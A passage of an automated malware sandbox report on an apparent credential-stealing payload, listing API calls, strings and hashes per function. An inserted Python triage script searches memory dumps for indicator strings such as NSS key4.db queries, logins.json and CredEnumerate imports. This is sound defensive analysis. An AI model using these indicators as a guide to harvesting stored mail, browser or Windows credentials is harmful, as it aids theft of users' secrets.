                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                    • String ID: J$Microsoft_WinInet
                    • API String ID: 2203907242-260894208
                    • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                    • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                    • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
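The function entries above carry the distinctive strings of the payload's credential-recovery code: the POP3/IMAP/SMTP/HTTPMail profile value names, the two key4.db statements and the logins.json/signons file names, the CredEnumerateA/CredEnumerateW/CredReadA imports with the Microsoft_WinInet prefix, the Creds / ps:password registry path and the %s@gmail.com format string. The Python below is an added triage script, not part of the Joe Sandbox report or of the sample. It scans a raw memory dump (for instance the .sdmp file named in each entry) for those strings in both ANSI and UTF-16LE and reports which credential stores the dumped image can read. The group labels, the two-hit threshold and the SAMPLE_DUMP bytes are this example's own constructions.

```python
import sys
from collections import defaultdict

# Indicator strings copied from the "String ID" and "APIs" entries of the
# report above, grouped by the credential store the matching function reads.
# The group labels are this example's own, not the report's.
INDICATORS = {
    "mail-client registry profiles (POP3/IMAP/SMTP/HTTPMail)": [
        "POP3 Server", "POP3 User Name", "POP3 User", "IMAP Server",
        "SMTP Server", "SMTP Use SSL", "HTTPMail Server", "Password2",
    ],
    "Firefox/Thunderbird NSS password store": [
        "key4.db", "logins.json", "signons.sqlite", "signons.txt",
        "SELECT a11,a102 FROM nssPrivate",
        "SELECT item1,item2 FROM metadata WHERE id = 'password'",
        "imap://%s@%s", "mailbox://%s@%s",
    ],
    "Windows Credential Manager / WinInet vault": [
        "CredEnumerateA", "CredEnumerateW", "CredReadA", "Microsoft_WinInet",
    ],
    "registry-stored credentials (Creds / ps:password)": [
        "Creds", "ps:password",
    ],
    "Google account reconstruction": ["%s@gmail.com", "www.google.com"],
}

# Mail clients and browsers legitimately contain single strings such as
# "IMAP Server" or "Creds"; require two hits per group before reporting it.
MIN_HITS = 2


def _encoded_forms(needle: str) -> tuple[bytes, bytes]:
    # A 32-bit user-mode image may hold a string as ANSI or as UTF-16LE.
    return needle.encode("ascii"), needle.encode("utf-16-le")


def find_indicators(buf: bytes) -> dict[str, list[str]]:
    """Map each group to the indicator strings that occur in buf (either encoding)."""
    hits: dict[str, list[str]] = defaultdict(list)
    for group, needles in INDICATORS.items():
        for needle in needles:
            if any(form in buf for form in _encoded_forms(needle)):
                hits[group].append(needle)
    return dict(hits)


def triage(buf: bytes, min_hits: int = MIN_HITS) -> list[str]:
    """Groups whose hit count reaches min_hits, sorted for stable reporting."""
    return sorted(g for g, found in find_indicators(buf).items() if len(found) >= min_hits)


# Constructed stand-in for a process memory dump: a handful of the report's strings
# (one of them UTF-16LE) padded with filler bytes. Not content of the real sample.
SAMPLE_DUMP = (
    b"\x00" * 64
    + b"key4.db\x00"
    + b"SELECT a11,a102 FROM nssPrivate\x00"
    + "CredEnumerateW".encode("utf-16-le") + b"\x00\x00"
    + b"Microsoft_WinInet\x00"
    + b"IMAP Server\x00"  # one mail-profile value alone stays below the threshold
    + b"\x90" * 32
)

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    for group in triage(data):
        print(f"[+] {group}: {', '.join(find_indicators(data)[group])}")
```

Run it as `python triage.py <dump.sdmp>` against the 0x400000 region dumped from the injected host process; the threshold keeps a lone "IMAP Server" or "Creds" from flagging a benign mail client, while the SQL statements and the Cred* import names rarely co-occur outside password-recovery code.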
                    APIs
                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                    • memcpy.MSVCRT ref: 00410961
                    Strings
                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FromStringUuid$memcpy
                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                    • API String ID: 2859077140-2022683286
                    • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                    • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                    • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                    • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                    APIs
                      • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                    • _mbscpy.MSVCRT ref: 00409686
                    • _mbscpy.MSVCRT ref: 00409696
                    • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                      • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                    • API String ID: 888011440-2039793938
                    • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                    • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                    • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                    APIs
                    Strings
                    • database %s is already in use, xrefs: 0042E9CE
                    • cannot ATTACH database within transaction, xrefs: 0042E966
                    • unable to open database: %s, xrefs: 0042EBD6
                    • database is already attached, xrefs: 0042EA97
                    • out of memory, xrefs: 0042EBEF
                    • too many attached databases - max %d, xrefs: 0042E951
                    • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                    • API String ID: 1297977491-2001300268
                    • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                    • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                    • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                    • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                    APIs
                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                    • strchr.MSVCRT ref: 0040327B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: PrivateProfileStringstrchr
                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                    • API String ID: 1348940319-1729847305
                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy
                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                    • API String ID: 3510742995-3273207271
                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscpy$sprintfstrchrstrlen
                    • String ID: %s@gmail.com
                    • API String ID: 3902205911-4097000612
                    • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                    • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                    • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                    APIs
                    • memset.MSVCRT ref: 004094C8
                    • GetDlgCtrlID.USER32(?), ref: 004094D3
                    • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                    • memset.MSVCRT ref: 0040950C
                    • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                    • _strcmpi.MSVCRT ref: 00409531
                      • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                    • String ID: sysdatetimepick32
                    • API String ID: 3411445237-4169760276
                    • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                    • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                    • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                    APIs
                    • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                    • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                    • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                    • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                    • GetSysColor.USER32(0000000F), ref: 0040B472
                    • DeleteObject.GDI32(?), ref: 0040B4A6
                    • DeleteObject.GDI32(00000000), ref: 0040B4A9
                    • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$DeleteImageLoadObject$Color
                    • String ID:
                    • API String ID: 3642520215-0
                    • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                    • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                    • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                    APIs
                    • GetSystemMetrics.USER32(00000011), ref: 004072E7
                    • GetSystemMetrics.USER32(00000010), ref: 004072ED
                    • GetDC.USER32(00000000), ref: 004072FB
                    • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                    • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                    • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                    • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                    • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                    • String ID:
                    • API String ID: 1999381814-0
                    • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                    • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                    • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpymemset
                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                    • API String ID: 1297977491-3883738016
                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                    APIs
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                      • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                      • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                    • memcpy.MSVCRT ref: 0044972E
                    • memcpy.MSVCRT ref: 0044977B
                    • memcpy.MSVCRT ref: 004497F6
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                      • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                    • memcpy.MSVCRT ref: 00449846
                    • memcpy.MSVCRT ref: 00449887
                    • memcpy.MSVCRT ref: 004498B8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpy$memset
                    • String ID: gj
                    • API String ID: 438689982-4203073231
                    • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                    • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                    • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: __aulldvrm$__aullrem
                    • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                    • API String ID: 643879872-978417875
                    • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                    • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                    • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                    APIs
                    • GetDlgItem.USER32(?,000003E9), ref: 00405827
                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                    • memset.MSVCRT ref: 004058C3
                    • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                    • SetFocus.USER32(?), ref: 00405976
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: MessageSend$FocusItemmemset
                    • String ID:
                    • API String ID: 4281309102-0
                    • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                    • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                    • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                    APIs
                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                    • _mbscat.MSVCRT ref: 0040A8FF
                    • sprintf.MSVCRT ref: 0040A921
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: FileWrite_mbscatsprintfstrlen
                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                    • API String ID: 1631269929-4153097237
                    • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                    • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                    • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                    APIs
                    • memset.MSVCRT ref: 0040810E
                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                    • String ID: POP3_credentials$POP3_host$POP3_name
                    • API String ID: 524865279-2190619648
                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: ItemMenu$CountInfomemsetstrchr
                    • String ID: 0$6
                    • API String ID: 2300387033-3849865405
                    • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                    • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memcpystrlen$memsetsprintf
                    • String ID: %s (%s)
                    • API String ID: 3756086014-1363028141
                    • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                    • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                    • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: _mbscat$memsetsprintf
                    • String ID: %2.2X
                    • API String ID: 125969286-791839006
                    • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                    • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                    APIs
                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                      • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                    • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                    • CloseHandle.KERNEL32(?), ref: 00444206
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                    • String ID: ACD
                    • API String ID: 1886237854-620537770
                    • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                    • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                    APIs
                    • memset.MSVCRT ref: 004091EC
                    • sprintf.MSVCRT ref: 00409201
                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                      • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                    • SetWindowTextA.USER32(?,?), ref: 00409228
                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                    Strings
                    Memory Dump Source
                    • Source File: 0000000F.00000002.2586920567.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_15_2_400000_wab.jbxd
                    Similarity
                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                    • String ID: caption$dialog_%d
                    • API String ID: 2923679083-4161923789
                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                    APIs
                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                    • memset.MSVCRT ref: 00410246
                    • memset.MSVCRT ref: 00410258
                      • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                    • memset.MSVCRT ref: 0041033F
                    • _mbscpy.MSVCRT ref: 00410364
